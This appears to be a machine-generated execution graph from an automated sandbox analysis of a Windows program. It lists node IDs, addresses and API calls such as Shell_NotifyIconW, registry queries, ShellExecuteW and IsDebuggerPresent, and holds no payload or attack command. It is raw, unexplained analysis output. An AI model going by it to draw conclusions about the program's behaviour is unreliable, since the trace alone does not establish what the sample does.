                                                            Signature Coverage:8.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:37
                                                            execution_graph 84193 4010e0 84196 401100 84193->84196 84195 4010f8 84197 401113 84196->84197 84199 401120 84197->84199 84200 401184 84197->84200 84201 40114c 84197->84201 84227 401182 84197->84227 84198 40112c DefWindowProcW 84198->84195 84199->84198 84241 401000 Shell_NotifyIconW __cftoa_l 84199->84241 84234 401250 61 API calls __cftoa_l 84200->84234 84203 401151 84201->84203 84204 40119d 84201->84204 84207 401219 84203->84207 84208 40115d 84203->84208 84205 4011a3 84204->84205 84206 42afb4 84204->84206 84205->84199 84215 4011b6 KillTimer 84205->84215 84216 4011db SetTimer RegisterWindowMessageW 84205->84216 84236 40f190 10 API calls 84206->84236 84207->84199 84212 401225 84207->84212 84211 401163 84208->84211 84217 42b01d 84208->84217 84218 42afe9 84211->84218 84219 40116c 84211->84219 84252 468b0e 74 API calls __cftoa_l 84212->84252 84213 401193 84213->84195 84214 42b04f 84242 40e0c0 84214->84242 84235 401000 Shell_NotifyIconW __cftoa_l 84215->84235 84216->84213 84225 401204 CreatePopupMenu 84216->84225 84217->84198 84240 4370f4 52 API calls 84217->84240 84238 40f190 10 API calls 84218->84238 84219->84199 84220 401174 84219->84220 84237 45fd57 65 API calls __cftoa_l 84220->84237 84225->84195 84227->84198 84228 42afe4 84228->84213 84229 42b00e 84239 401a50 338 API calls 84229->84239 84230 4011c9 PostQuitMessage 84230->84195 84233 42afdc 84233->84198 84233->84228 84234->84213 84235->84230 84236->84213 84237->84233 84238->84229 84239->84227 84240->84227 84241->84214 84243 40e0e7 __cftoa_l 84242->84243 84244 42729f DestroyIcon 84243->84244 84246 40e142 84243->84246 84244->84246 84245 40e184 84248 40e1a0 Shell_NotifyIconW 84245->84248 84249 4272db Shell_NotifyIconW 84245->84249 84246->84245 84275 4341e6 63 API calls __wcsicoll 84246->84275 84253 401b80 84248->84253 84251 40e1ba 84251->84227 84252->84228 84254 401b9c 84253->84254 84274 401c7e 84253->84274 84276 4013c0 84254->84276 84257 42722b LoadStringW 84260 427246 84257->84260 84258 401bb9 84281 402160 84258->84281 84295 40e0a0 84260->84295 84261 401bcd 84263 427258 84261->84263 84264 401bda 84261->84264 84299 40d200 52 API calls 2 library calls 84263->84299 84264->84260 84265 401be4 84264->84265 84294 40d200 52 API calls 2 library calls 84265->84294 84268 427267 84269 42727b 84268->84269 84271 401bf3 _wcscpy __cftoa_l _wcsncpy 84268->84271 84300 40d200 52 API calls 2 library calls 84269->84300 84273 401c62 Shell_NotifyIconW 84271->84273 84272 427289 84273->84274 84274->84251 84275->84245 84301 4115d7 84276->84301 84282 426daa 84281->84282 84283 40216b _wcslen 84281->84283 84339 40c600 84282->84339 84286 402180 84283->84286 84287 40219e 84283->84287 84285 426db5 84285->84261 84338 403bd0 52 API calls ctype 84286->84338 84289 4013a0 52 API calls 84287->84289 84291 4021a5 84289->84291 84290 402187 _memmove 84290->84261 84292 426db7 84291->84292 84293 4115d7 52 API calls 84291->84293 84293->84290 84294->84271 84296 40e0b2 84295->84296 84297 40e0a8 84295->84297 84296->84271 84351 403c30 52 API calls _memmove 84297->84351 84299->84268 84300->84272 84303 4115e1 _malloc 84301->84303 84304 4013e4 84303->84304 84308 4115fd std::exception::exception 84303->84308 84315 4135bb 84303->84315 84312 4013a0 84304->84312 84305 41163b 84330 4180af 46 API calls std::exception::operator= 84305->84330 84307 411645 84331 418105 RaiseException 84307->84331 84308->84305 84329 41130a 51 API calls __cinit 84308->84329 84311 411656 84313 4115d7 52 API calls 84312->84313 84314 4013a7 84313->84314 84314->84257 84314->84258 84316 413638 _malloc 84315->84316 84324 4135c9 _malloc 84315->84324 84337 417f77 46 API calls __getptd_noexit 84316->84337 84319 4135f7 RtlAllocateHeap 84319->84324 84328 413630 84319->84328 84321 413624 84335 417f77 46 API calls __getptd_noexit 84321->84335 84324->84319 84324->84321 84325 413622 84324->84325 84326 4135d4 84324->84326 84336 417f77 46 API calls __getptd_noexit 84325->84336 84326->84324 84332 418901 46 API calls __NMSG_WRITE 84326->84332 84333 418752 46 API calls 6 library calls 84326->84333 84334 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84326->84334 84328->84303 84329->84305 84330->84307 84331->84311 84332->84326 84333->84326 84335->84325 84336->84328 84337->84328 84338->84290 84340 40c619 84339->84340 84341 40c60a 84339->84341 84340->84285 84341->84340 84344 4026f0 84341->84344 84343 426d7a _memmove 84343->84285 84345 426873 84344->84345 84346 4026ff 84344->84346 84347 4013a0 52 API calls 84345->84347 84346->84343 84348 42687b 84347->84348 84349 4115d7 52 API calls 84348->84349 84350 42689e _memmove 84349->84350 84350->84343 84351->84296 84352 40bd20 84353 428194 84352->84353 84354 40bd2d 84352->84354 84355 40bd43 84353->84355 84357 4281bc 84353->84357 84359 4281b2 84353->84359 84356 40bd37 84354->84356 84375 4531b1 85 API calls 5 library calls 84354->84375 84364 40bd50 84356->84364 84374 45e987 86 API calls ctype 84357->84374 84373 40b510 VariantClear 84359->84373 84363 4281ba 84365 426cf1 84364->84365 84366 40bd63 84364->84366 84385 44cde9 52 API calls _memmove 84365->84385 84376 40bd80 84366->84376 84369 40bd73 84369->84355 84370 426cfc 84371 40e0a0 52 API calls 84370->84371 84372 426d02 84371->84372 84373->84363 84374->84354 84375->84356 84377 40bd8e 84376->84377 84382 40bdb7 _memmove 84376->84382 84378 40bded 84377->84378 84379 40bdad 84377->84379 84377->84382 84380 4115d7 52 API calls 84378->84380 84386 402f00 84379->84386 84383 40bdf6 84380->84383 84382->84369 84383->84382 84384 4115d7 52 API calls 84383->84384 84384->84382 84385->84370 84387 402f10 84386->84387 84388 402f0c 84386->84388 84389 4115d7 52 API calls 84387->84389 84390 4268c3 84387->84390 84388->84382 84391 402f51 ctype _memmove 84389->84391 84391->84382 84392 425ba2 84397 40e360 84392->84397 84394 425bb4 84413 41130a 51 API calls __cinit 84394->84413 84396 425bbe 84398 4115d7 52 API calls 84397->84398 84399 40e3ec GetModuleFileNameW 84398->84399 84414 413a0e 84399->84414 84401 40e421 _wcsncat 84417 413a9e 84401->84417 84404 4115d7 52 API calls 84405 40e45e _wcscpy 84404->84405 84420 40bc70 84405->84420 84409 40e4a9 84409->84394 84410 401c90 52 API calls 84411 40e4a1 _wcscat _wcslen _wcsncpy 84410->84411 84411->84409 84411->84410 84412 4115d7 52 API calls 84411->84412 84412->84411 84413->84396 84439 413801 84414->84439 84469 419efd 84417->84469 84421 4115d7 52 API calls 84420->84421 84422 40bc98 84421->84422 84423 4115d7 52 API calls 84422->84423 84424 40bca6 84423->84424 84425 40e4c0 84424->84425 84481 403350 84425->84481 84427 40e4cb RegOpenKeyExW 84428 427190 RegQueryValueExW 84427->84428 84429 40e4eb 84427->84429 84430 4271b0 84428->84430 84431 42721a RegCloseKey 84428->84431 84429->84411 84432 4115d7 52 API calls 84430->84432 84431->84411 84433 4271cb 84432->84433 84488 43652f 52 API calls 84433->84488 84435 4271d8 RegQueryValueExW 84436 4271f7 84435->84436 84438 42720e 84435->84438 84437 402160 52 API calls 84436->84437 84437->84438 84438->84431 84440 41389e 84439->84440 84446 41381a 84439->84446 84441 4139e8 84440->84441 84443 413a00 84440->84443 84466 417f77 46 API calls __getptd_noexit 84441->84466 84468 417f77 46 API calls __getptd_noexit 84443->84468 84444 4139ed 84467 417f25 10 API calls __tsopen_nolock 84444->84467 84446->84440 84457 41388a 84446->84457 84461 419e30 46 API calls __tsopen_nolock 84446->84461 84448 413967 84448->84401 84449 413909 84451 41396c 84449->84451 84452 413929 84449->84452 84451->84440 84451->84448 84453 41397a 84451->84453 84452->84440 84458 413945 84452->84458 84463 419e30 46 API calls __tsopen_nolock 84452->84463 84465 419e30 46 API calls __tsopen_nolock 84453->84465 84456 41395b 84464 419e30 46 API calls __tsopen_nolock 84456->84464 84457->84440 84457->84449 84462 419e30 46 API calls __tsopen_nolock 84457->84462 84458->84440 84458->84448 84458->84456 84461->84457 84462->84449 84463->84458 84464->84448 84465->84448 84466->84444 84467->84448 84468->84448 84470 419f13 84469->84470 84471 419f0e 84469->84471 84478 417f77 46 API calls __getptd_noexit 84470->84478 84471->84470 84474 419f2b 84471->84474 84473 419f18 84479 417f25 10 API calls __tsopen_nolock 84473->84479 84477 40e454 84474->84477 84480 417f77 46 API calls __getptd_noexit 84474->84480 84477->84404 84478->84473 84479->84477 84480->84473 84482 403367 84481->84482 84483 403358 84481->84483 84484 4115d7 52 API calls 84482->84484 84483->84427 84485 403370 84484->84485 84486 4115d7 52 API calls 84485->84486 84487 40339e 84486->84487 84487->84427 84488->84435 84489 416454 84526 416c70 84489->84526 84491 416460 GetStartupInfoW 84492 416474 84491->84492 84527 419d5a HeapCreate 84492->84527 84494 4164cd 84495 4164d8 84494->84495 84611 41642b 46 API calls 3 library calls 84494->84611 84528 417c20 GetModuleHandleW 84495->84528 84498 4164de 84499 4164e9 __RTC_Initialize 84498->84499 84612 41642b 46 API calls 3 library calls 84498->84612 84547 41aaa1 GetStartupInfoW 84499->84547 84503 416503 GetCommandLineW 84560 41f584 GetEnvironmentStringsW 84503->84560 84507 416513 84566 41f4d6 GetModuleFileNameW 84507->84566 84509 41651d 84510 416528 84509->84510 84614 411924 46 API calls 3 library calls 84509->84614 84570 41f2a4 84510->84570 84513 41652e 84514 416539 84513->84514 84615 411924 46 API calls 3 library calls 84513->84615 84584 411703 84514->84584 84517 416541 84519 41654c __wwincmdln 84517->84519 84616 411924 46 API calls 3 library calls 84517->84616 84588 40d6b0 84519->84588 84522 41657c 84618 411906 46 API calls _doexit 84522->84618 84525 416581 __tsopen_nolock 84526->84491 84527->84494 84529 417c34 84528->84529 84530 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84528->84530 84619 4178ff 49 API calls _free 84529->84619 84532 417c87 TlsAlloc 84530->84532 84535 417cd5 TlsSetValue 84532->84535 84536 417d96 84532->84536 84533 417c39 84533->84498 84535->84536 84537 417ce6 __init_pointers 84535->84537 84536->84498 84620 418151 InitializeCriticalSectionAndSpinCount 84537->84620 84539 417d91 84628 4178ff 49 API calls _free 84539->84628 84541 417d2a 84541->84539 84621 416b49 84541->84621 84544 417d76 84627 41793c 46 API calls 4 library calls 84544->84627 84546 417d7e GetCurrentThreadId 84546->84536 84548 416b49 __calloc_crt 46 API calls 84547->84548 84554 41aabf 84548->84554 84549 41ac6a GetStdHandle 84555 41ac34 84549->84555 84550 41acce SetHandleCount 84559 4164f7 84550->84559 84551 416b49 __calloc_crt 46 API calls 84551->84554 84552 41ac7c GetFileType 84552->84555 84553 41abb4 84553->84555 84556 41abe0 GetFileType 84553->84556 84557 41abeb InitializeCriticalSectionAndSpinCount 84553->84557 84554->84551 84554->84553 84554->84555 84554->84559 84555->84549 84555->84550 84555->84552 84558 41aca2 InitializeCriticalSectionAndSpinCount 84555->84558 84556->84553 84556->84557 84557->84553 84557->84559 84558->84555 84558->84559 84559->84503 84613 411924 46 API calls 3 library calls 84559->84613 84561 41f595 84560->84561 84562 41f599 84560->84562 84561->84507 84562->84562 84638 416b04 84562->84638 84564 41f5bb _memmove 84565 41f5c2 FreeEnvironmentStringsW 84564->84565 84565->84507 84568 41f50b _wparse_cmdline 84566->84568 84567 41f54e _wparse_cmdline 84567->84509 84568->84567 84569 416b04 __malloc_crt 46 API calls 84568->84569 84569->84567 84571 41f2bc _wcslen 84570->84571 84575 41f2b4 84570->84575 84572 416b49 __calloc_crt 46 API calls 84571->84572 84577 41f2e0 _wcslen 84572->84577 84573 41f336 84645 413748 84573->84645 84575->84513 84576 416b49 __calloc_crt 46 API calls 84576->84577 84577->84573 84577->84575 84577->84576 84578 41f35c 84577->84578 84581 41f373 84577->84581 84644 41ef12 46 API calls __tsopen_nolock 84577->84644 84579 413748 _free 46 API calls 84578->84579 84579->84575 84651 417ed3 84581->84651 84583 41f37f 84583->84513 84585 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84584->84585 84587 411750 __IsNonwritableInCurrentImage 84585->84587 84670 41130a 51 API calls __cinit 84585->84670 84587->84517 84589 42e2f3 84588->84589 84590 40d6cc 84588->84590 84671 408f40 84590->84671 84592 40d707 84675 40ebb0 84592->84675 84595 40d737 84678 411951 84595->84678 84600 40d751 84690 40f4e0 SystemParametersInfoW SystemParametersInfoW 84600->84690 84602 40d75f 84691 40d590 GetCurrentDirectoryW 84602->84691 84604 40d767 SystemParametersInfoW 84605 40d794 84604->84605 84606 40d78d FreeLibrary 84604->84606 84607 408f40 VariantClear 84605->84607 84606->84605 84608 40d79d 84607->84608 84609 408f40 VariantClear 84608->84609 84610 40d7a6 84609->84610 84610->84522 84617 4118da 46 API calls _doexit 84610->84617 84611->84495 84612->84499 84617->84522 84618->84525 84619->84533 84620->84541 84623 416b52 84621->84623 84624 416b8f 84623->84624 84625 416b70 Sleep 84623->84625 84629 41f677 84623->84629 84624->84539 84624->84544 84626 416b85 84625->84626 84626->84623 84626->84624 84627->84546 84628->84536 84630 41f683 84629->84630 84631 41f69e _malloc 84629->84631 84630->84631 84632 41f68f 84630->84632 84634 41f6b1 HeapAlloc 84631->84634 84636 41f6d8 84631->84636 84637 417f77 46 API calls __getptd_noexit 84632->84637 84634->84631 84634->84636 84635 41f694 84635->84623 84636->84623 84637->84635 84641 416b0d 84638->84641 84639 4135bb _malloc 45 API calls 84639->84641 84640 416b43 84640->84564 84641->84639 84641->84640 84642 416b24 Sleep 84641->84642 84643 416b39 84642->84643 84643->84640 84643->84641 84644->84577 84646 41377c __dosmaperr 84645->84646 84647 413753 RtlFreeHeap 84645->84647 84646->84575 84647->84646 84648 413768 84647->84648 84654 417f77 46 API calls __getptd_noexit 84648->84654 84650 41376e GetLastError 84650->84646 84655 417daa 84651->84655 84654->84650 84656 417dc9 __cftoa_l __call_reportfault 84655->84656 84657 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84656->84657 84660 417eb5 __call_reportfault 84657->84660 84659 417ed1 GetCurrentProcess TerminateProcess 84659->84583 84661 41a208 84660->84661 84662 41a210 84661->84662 84663 41a212 IsDebuggerPresent 84661->84663 84662->84659 84669 41fe19 84663->84669 84666 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84667 421ff0 __call_reportfault 84666->84667 84668 421ff8 GetCurrentProcess TerminateProcess 84666->84668 84667->84668 84668->84659 84669->84666 84670->84587 84673 408f48 ctype 84671->84673 84672 4265c7 VariantClear 84674 408f55 ctype 84672->84674 84673->84672 84673->84674 84674->84592 84731 40ebd0 84675->84731 84735 4182cb 84678->84735 84680 41195e 84742 4181f2 LeaveCriticalSection 84680->84742 84682 40d748 84683 4119b0 84682->84683 84684 4119d6 84683->84684 84685 4119bc 84683->84685 84684->84600 84685->84684 84777 417f77 46 API calls __getptd_noexit 84685->84777 84687 4119c6 84778 417f25 10 API calls __tsopen_nolock 84687->84778 84689 4119d1 84689->84600 84690->84602 84779 401f20 84691->84779 84693 40d5b6 IsDebuggerPresent 84694 40d5c4 84693->84694 84695 42e1bb MessageBoxA 84693->84695 84696 42e1d4 84694->84696 84697 40d5e3 84694->84697 84695->84696 84951 403a50 52 API calls 3 library calls 84696->84951 84849 40f520 84697->84849 84701 40d5fd GetFullPathNameW 84861 401460 84701->84861 84703 40d63b 84704 40d643 84703->84704 84705 42e231 SetCurrentDirectoryW 84703->84705 84706 40d64c 84704->84706 84952 432fee 6 API calls 84704->84952 84705->84704 84876 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84706->84876 84709 42e252 84709->84706 84711 42e25a GetModuleFileNameW 84709->84711 84713 42e274 84711->84713 84714 42e2cb GetForegroundWindow ShellExecuteW 84711->84714 84953 401b10 84713->84953 84716 40d688 84714->84716 84715 40d656 84718 40d669 84715->84718 84719 40e0c0 74 API calls 84715->84719 84723 40d692 SetCurrentDirectoryW 84716->84723 84884 4091e0 84718->84884 84719->84718 84723->84604 84725 42e28d 84960 40d200 52 API calls 2 library calls 84725->84960 84728 42e299 GetForegroundWindow ShellExecuteW 84729 42e2c6 84728->84729 84729->84716 84730 40ec00 LoadLibraryA GetProcAddress 84730->84595 84732 40d72e 84731->84732 84733 40ebd6 LoadLibraryA 84731->84733 84732->84595 84732->84730 84733->84732 84734 40ebe7 GetProcAddress 84733->84734 84734->84732 84736 4182e0 84735->84736 84737 4182f3 EnterCriticalSection 84735->84737 84743 418209 84736->84743 84737->84680 84739 4182e6 84739->84737 84770 411924 46 API calls 3 library calls 84739->84770 84742->84682 84744 418215 __tsopen_nolock 84743->84744 84745 418225 84744->84745 84746 41823d 84744->84746 84771 418901 46 API calls __NMSG_WRITE 84745->84771 84748 416b04 __malloc_crt 45 API calls 84746->84748 84755 41824b __tsopen_nolock 84746->84755 84750 418256 84748->84750 84749 41822a 84772 418752 46 API calls 6 library calls 84749->84772 84753 41825d 84750->84753 84754 41826c 84750->84754 84752 418231 84773 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84752->84773 84774 417f77 46 API calls __getptd_noexit 84753->84774 84758 4182cb __lock 45 API calls 84754->84758 84755->84739 84760 418273 84758->84760 84761 4182a6 84760->84761 84762 41827b InitializeCriticalSectionAndSpinCount 84760->84762 84763 413748 _free 45 API calls 84761->84763 84764 418297 84762->84764 84765 41828b 84762->84765 84763->84764 84776 4182c2 LeaveCriticalSection _doexit 84764->84776 84766 413748 _free 45 API calls 84765->84766 84767 418291 84766->84767 84775 417f77 46 API calls __getptd_noexit 84767->84775 84771->84749 84772->84752 84774->84755 84775->84764 84776->84755 84777->84687 84778->84689 84961 40e6e0 84779->84961 84783 401f41 GetModuleFileNameW 84979 410100 84783->84979 84785 401f5c 84991 410960 84785->84991 84788 401b10 52 API calls 84789 401f81 84788->84789 84994 401980 84789->84994 84791 401f8e 84792 408f40 VariantClear 84791->84792 84793 401f9d 84792->84793 84794 401b10 52 API calls 84793->84794 84795 401fb4 84794->84795 84796 401980 53 API calls 84795->84796 84797 401fc3 84796->84797 84798 401b10 52 API calls 84797->84798 84799 401fd2 84798->84799 85002 40c2c0 84799->85002 84801 401fe1 84802 40bc70 52 API calls 84801->84802 84803 401ff3 84802->84803 85020 401a10 84803->85020 84805 401ffe 85027 4114ab 84805->85027 84808 428b05 84810 401a10 52 API calls 84808->84810 84809 402017 84811 4114ab __wcsicoll 58 API calls 84809->84811 84812 428b18 84810->84812 84813 402022 84811->84813 84815 401a10 52 API calls 84812->84815 84813->84812 84814 40202d 84813->84814 84816 4114ab __wcsicoll 58 API calls 84814->84816 84817 428b33 84815->84817 84818 402038 84816->84818 84820 428b3b GetModuleFileNameW 84817->84820 84819 402043 84818->84819 84818->84820 84821 4114ab __wcsicoll 58 API calls 84819->84821 84822 401a10 52 API calls 84820->84822 84823 40204e 84821->84823 84824 428b6c 84822->84824 84829 401a10 52 API calls 84823->84829 84831 428b90 _wcscpy 84823->84831 84840 402092 84823->84840 84825 40e0a0 52 API calls 84824->84825 84827 428b7a 84825->84827 84826 4020a3 84828 428bc6 84826->84828 85035 40e830 53 API calls 84826->85035 84830 401a10 52 API calls 84827->84830 84836 402073 _wcscpy 84829->84836 84833 428b88 84830->84833 84834 401a10 52 API calls 84831->84834 84833->84831 84844 4020d0 84834->84844 84835 4020bb 85036 40cf00 53 API calls 84835->85036 84838 401a10 52 API calls 84836->84838 84838->84840 84839 4020c6 84841 408f40 VariantClear 84839->84841 84840->84826 84840->84831 84841->84844 84842 402110 84846 408f40 VariantClear 84842->84846 84844->84842 84847 401a10 52 API calls 84844->84847 85037 40cf00 53 API calls 84844->85037 85038 40e6a0 53 API calls 84844->85038 84848 402120 ctype 84846->84848 84847->84844 84848->84693 84850 4295c9 __cftoa_l 84849->84850 84851 40f53c 84849->84851 84853 4295d9 GetOpenFileNameW 84850->84853 85714 410120 84851->85714 84853->84851 84855 40d5f5 84853->84855 84854 40f545 85718 4102b0 SHGetMalloc 84854->85718 84855->84701 84855->84703 84857 40f54c 85723 410190 GetFullPathNameW 84857->85723 84859 40f559 85734 40f570 84859->85734 85796 402400 84861->85796 84863 40146f 84864 428c29 _wcscat 84863->84864 85805 401500 84863->85805 84866 40147c 84866->84864 85813 40d440 84866->85813 84868 401489 84868->84864 84869 401491 GetFullPathNameW 84868->84869 84870 402160 52 API calls 84869->84870 84871 4014bb 84870->84871 84872 402160 52 API calls 84871->84872 84873 4014c8 84872->84873 84873->84864 84874 402160 52 API calls 84873->84874 84875 4014ee 84874->84875 84875->84703 84877 428361 84876->84877 84878 4103fc LoadImageW RegisterClassExW 84876->84878 85883 44395e EnumResourceNamesW LoadImageW 84877->85883 85882 410490 7 API calls 84878->85882 84881 40d651 84883 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84881->84883 84882 428368 84883->84715 84885 409202 84884->84885 84886 42d7ad 84884->84886 84943 409216 ctype 84885->84943 86146 410940 338 API calls 84885->86146 86149 45e737 90 API calls 3 library calls 84886->86149 84889 40939c 84889->84716 84950 401000 Shell_NotifyIconW __cftoa_l 84889->84950 84891 4095b2 84891->84889 84893 4095bf 84891->84893 84892 409253 PeekMessageW 84892->84943 86148 401a50 338 API calls 84893->86148 84895 40d410 VariantClear 84895->84943 84896 42d8cd Sleep 84896->84943 84897 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84897->84889 84900 4095f9 84897->84900 84899 42e13b 86167 40d410 VariantClear 84899->86167 84902 42e158 TranslateMessage DispatchMessageW GetMessageW 84900->84902 84902->84902 84906 42e188 84902->84906 84904 409567 PeekMessageW 84904->84943 84905 409386 84905->84889 86147 40f190 10 API calls 84905->86147 84906->84889 84909 44c29d 52 API calls 84949 4094e0 84909->84949 84910 46fdbf 108 API calls 84910->84949 84911 46f3c1 107 API calls 84911->84943 84912 40e0a0 52 API calls 84912->84943 84913 409551 TranslateMessage DispatchMessageW 84913->84904 84915 42dcd2 WaitForSingleObject 84916 42dcf0 GetExitCodeProcess CloseHandle 84915->84916 84915->84943 86156 40d410 VariantClear 84916->86156 84918 42dd3d Sleep 84918->84949 84921 4094cf Sleep 84921->84949 84923 42d94d timeGetTime 86152 465124 53 API calls 84923->86152 84925 40c620 timeGetTime 84925->84949 84928 42dd89 CloseHandle 84928->84949 84929 47d33e 316 API calls 84929->84943 84931 408f40 VariantClear 84931->84949 84932 465124 53 API calls 84932->84949 84933 42de19 GetExitCodeProcess CloseHandle 84933->84949 84935 401b10 52 API calls 84935->84949 84937 42de88 Sleep 84937->84943 84942 42e0cc VariantClear 84942->84943 84943->84892 84943->84895 84943->84896 84943->84899 84943->84904 84943->84905 84943->84911 84943->84912 84943->84913 84943->84915 84943->84918 84943->84921 84943->84923 84943->84929 84943->84942 84944 45e737 90 API calls 84943->84944 84945 408f40 VariantClear 84943->84945 84943->84949 85884 4091b0 84943->85884 85942 40afa0 84943->85942 85968 408fc0 84943->85968 86003 408cc0 84943->86003 86017 4096a0 84943->86017 86144 40d150 TranslateAcceleratorW 84943->86144 86145 40d170 IsDialogMessageW GetClassLongW 84943->86145 86150 465124 53 API calls 84943->86150 86151 40c620 timeGetTime 84943->86151 86166 40e270 VariantClear ctype 84943->86166 84944->84943 84945->84943 84947 401980 53 API calls 84947->84949 84949->84909 84949->84910 84949->84925 84949->84928 84949->84931 84949->84932 84949->84933 84949->84935 84949->84937 84949->84943 84949->84947 86153 45178a 54 API calls 84949->86153 86154 47d33e 338 API calls 84949->86154 86155 453bc6 54 API calls 84949->86155 86157 40d410 VariantClear 84949->86157 86158 443d19 67 API calls _wcslen 84949->86158 86159 4574b4 VariantClear 84949->86159 86160 403cd0 84949->86160 86164 4731e1 VariantClear 84949->86164 86165 4331a2 6 API calls 84949->86165 84950->84716 84951->84703 84952->84709 84954 401b16 _wcslen 84953->84954 84955 4115d7 52 API calls 84954->84955 84957 401b63 84954->84957 84956 401b4b _memmove 84955->84956 84958 4115d7 52 API calls 84956->84958 84959 40d200 52 API calls 2 library calls 84957->84959 84958->84957 84959->84725 84960->84728 84962 40bc70 52 API calls 84961->84962 84963 401f31 84962->84963 84964 402560 84963->84964 84965 40256d __write_nolock 84964->84965 84966 402160 52 API calls 84965->84966 84967 402593 84966->84967 84977 4025bd 84967->84977 85039 401c90 84967->85039 84969 4026f0 52 API calls 84969->84977 84970 4026a7 84971 401b10 52 API calls 84970->84971 84975 4026db 84970->84975 84973 4026d1 84971->84973 84972 401b10 52 API calls 84972->84977 85043 40d7c0 52 API calls 2 library calls 84973->85043 84975->84783 84977->84969 84977->84970 84977->84972 84978 401c90 52 API calls 84977->84978 85042 40d7c0 52 API calls 2 library calls 84977->85042 84978->84977 85044 40f760 84979->85044 84982 410118 84982->84785 84984 42805d 84985 42806a 84984->84985 85100 431e58 84984->85100 84986 413748 _free 46 API calls 84985->84986 84988 428078 84986->84988 84989 431e58 82 API calls 84988->84989 84990 428084 84989->84990 84990->84785 84992 4115d7 52 API calls 84991->84992 84993 401f74 84992->84993 84993->84788 84995 4019a3 84994->84995 85000 401985 84994->85000 84996 4019b8 84995->84996 84995->85000 85703 403e10 53 API calls 84996->85703 84998 40199f 84998->84791 84999 4019c4 84999->84791 85000->84998 85702 403e10 53 API calls 85000->85702 85003 40c2c7 85002->85003 85004 40c30e 85002->85004 85007 40c2d3 85003->85007 85008 426c79 85003->85008 85005 40c315 85004->85005 85006 426c2b 85004->85006 85009 40c321 85005->85009 85010 426c5a 85005->85010 85012 426c4b 85006->85012 85013 426c2e 85006->85013 85704 403ea0 52 API calls __cinit 85007->85704 85709 4534e3 52 API calls 85008->85709 85705 403ea0 52 API calls __cinit 85009->85705 85708 4534e3 52 API calls 85010->85708 85707 4534e3 52 API calls 85012->85707 85019 40c2de 85013->85019 85706 4534e3 52 API calls 85013->85706 85019->84801 85019->85019 85021 401a30 85020->85021 85022 401a17 85020->85022 85024 402160 52 API calls 85021->85024 85023 401a2d 85022->85023 85710 403c30 52 API calls _memmove 85022->85710 85023->84805 85026 401a3d 85024->85026 85026->84805 85028 411523 85027->85028 85029 4114ba 85027->85029 85713 4113a8 58 API calls 3 library calls 85028->85713 85034 40200c 85029->85034 85711 417f77 46 API calls __getptd_noexit 85029->85711 85032 4114c6 85712 417f25 10 API calls __tsopen_nolock 85032->85712 85034->84808 85034->84809 85035->84835 85036->84839 85037->84844 85038->84844 85040 4026f0 52 API calls 85039->85040 85041 401c97 85040->85041 85041->84967 85042->84977 85043->84975 85104 40f6f0 85044->85104 85046 40f77b _strcat ctype 85112 40f850 85046->85112 85051 427c2a 85141 414d04 85051->85141 85053 40f7fc 85053->85051 85054 40f804 85053->85054 85128 414a46 85054->85128 85058 40f80e 85058->84982 85063 4528bd 85058->85063 85060 427c59 85147 414fe2 85060->85147 85062 427c79 85064 4150d1 _fseek 81 API calls 85063->85064 85065 452930 85064->85065 85644 452719 85065->85644 85068 452948 85068->84984 85069 414d04 __fread_nolock 61 API calls 85070 452966 85069->85070 85071 414d04 __fread_nolock 61 API calls 85070->85071 85072 452976 85071->85072 85073 414d04 __fread_nolock 61 API calls 85072->85073 85074 45298f 85073->85074 85075 414d04 __fread_nolock 61 API calls 85074->85075 85076 4529aa 85075->85076 85077 4150d1 _fseek 81 API calls 85076->85077 85078 4529c4 85077->85078 85079 4135bb _malloc 46 API calls 85078->85079 85080 4529cf 85079->85080 85081 4135bb _malloc 46 API calls 85080->85081 85082 4529db 85081->85082 85083 414d04 __fread_nolock 61 API calls 85082->85083 85084 4529ec 85083->85084 85085 44afef GetSystemTimeAsFileTime 85084->85085 85086 452a00 85085->85086 85087 452a36 85086->85087 85088 452a13 85086->85088 85090 452aa5 85087->85090 85091 452a3c 85087->85091 85089 413748 _free 46 API calls 85088->85089 85093 452a1c 85089->85093 85092 413748 _free 46 API calls 85090->85092 85650 44b1a9 85091->85650 85095 452aa3 85092->85095 85096 413748 _free 46 API calls 85093->85096 85095->84984 85098 452a25 85096->85098 85097 452a9d 85099 413748 _free 46 API calls 85097->85099 85098->84984 85099->85095 85101 431e64 85100->85101 85102 431e6a 85100->85102 85103 414a46 __fcloseall 82 API calls 85101->85103 85102->84985 85103->85102 85105 425de2 85104->85105 85106 40f6fc _wcslen 85104->85106 85105->85046 85107 40f710 WideCharToMultiByte 85106->85107 85108 40f756 85107->85108 85109 40f728 85107->85109 85108->85046 85110 4115d7 52 API calls 85109->85110 85111 40f735 WideCharToMultiByte 85110->85111 85111->85046 85114 40f85d __cftoa_l _strlen 85112->85114 85115 40f7ab 85114->85115 85160 414db8 85114->85160 85116 4149c2 85115->85116 85172 414904 85116->85172 85118 40f7e9 85118->85051 85119 40f5c0 85118->85119 85120 40f5cd _strcat __write_nolock _memmove 85119->85120 85121 414d04 __fread_nolock 61 API calls 85120->85121 85122 40f691 __tzset_nolock 85120->85122 85124 425d11 85120->85124 85260 4150d1 85120->85260 85121->85120 85122->85053 85125 4150d1 _fseek 81 API calls 85124->85125 85126 425d33 85125->85126 85127 414d04 __fread_nolock 61 API calls 85126->85127 85127->85122 85129 414a52 __tsopen_nolock 85128->85129 85130 414a64 85129->85130 85131 414a79 85129->85131 85400 417f77 46 API calls __getptd_noexit 85130->85400 85133 415471 __lock_file 47 API calls 85131->85133 85137 414a74 __tsopen_nolock 85131->85137 85135 414a92 85133->85135 85134 414a69 85401 417f25 10 API calls __tsopen_nolock 85134->85401 85384 4149d9 85135->85384 85137->85058 85469 414c76 85141->85469 85143 414d1c 85144 44afef 85143->85144 85637 442c5a 85144->85637 85146 44b00d 85146->85060 85148 414fee __tsopen_nolock 85147->85148 85149 414ffa 85148->85149 85150 41500f 85148->85150 85641 417f77 46 API calls __getptd_noexit 85149->85641 85151 415471 __lock_file 47 API calls 85150->85151 85154 415017 85151->85154 